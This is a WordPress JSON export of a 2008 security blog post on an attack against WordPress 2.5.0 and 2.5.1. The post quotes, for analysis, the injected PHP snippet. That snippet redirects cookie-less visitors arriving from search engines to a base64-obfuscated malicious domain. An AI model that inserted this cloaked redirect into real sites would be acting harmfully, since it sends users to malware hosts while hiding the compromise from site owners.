{"id":329,"date":"2008-06-08T17:54:19","date_gmt":"2008-06-08T21:54:19","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2008\/06\/08\/wordpress-250-and-251-vulnerable-to-a"},"modified":"2008-06-08T17:55:57","modified_gmt":"2008-06-08T21:55:57","slug":"wordpress-250-and-251-vulnerable-to-attack","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2008\/06\/08\/wordpress-250-and-251-vulnerable-to-attack\/","title":{"rendered":"WordPress 2.5.0 and 2.5.1 vulnerable to attack"},"content":{"rendered":"

Thanks to co-author Brandon Palmen<\/a> for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up<\/a> here. <\/p>\n

The code snippets from a digitalpoint.com forum<\/a> are shown using base64 encoding to hide the true destination:<\/p>\n


\n<php>
\n $seref=array("google","msn",
\n "live","altavista","ask",
\n "yahoo","aol","cnn",
\n "weather","alexa");<\/p>\n

$ser=0;
\nforeach($seref as $ref) <\/p>\n

if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
\n { $ser="1"; break; }<\/p>\n

if($ser=="1" && sizeof($_COOKIE)==0)
\n {
\n header("Location:http:\/\/" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "\/");
\n exit;
\n }
\n ><\/php>
\n<\/code><\/p>\n

This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.<\/p>\n","protected":false},"excerpt":{"rendered":"

Thanks to co-author Brandon Palmen for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up here. The code snippets from a digitalpoint.com forum are shown using base64 encoding […]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272,275],"tags":[],"class_list":["post-329","post","type-post","status-publish","format-standard","hentry","category-digital-warfare","category-vulnerabilities"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=329"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/329\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}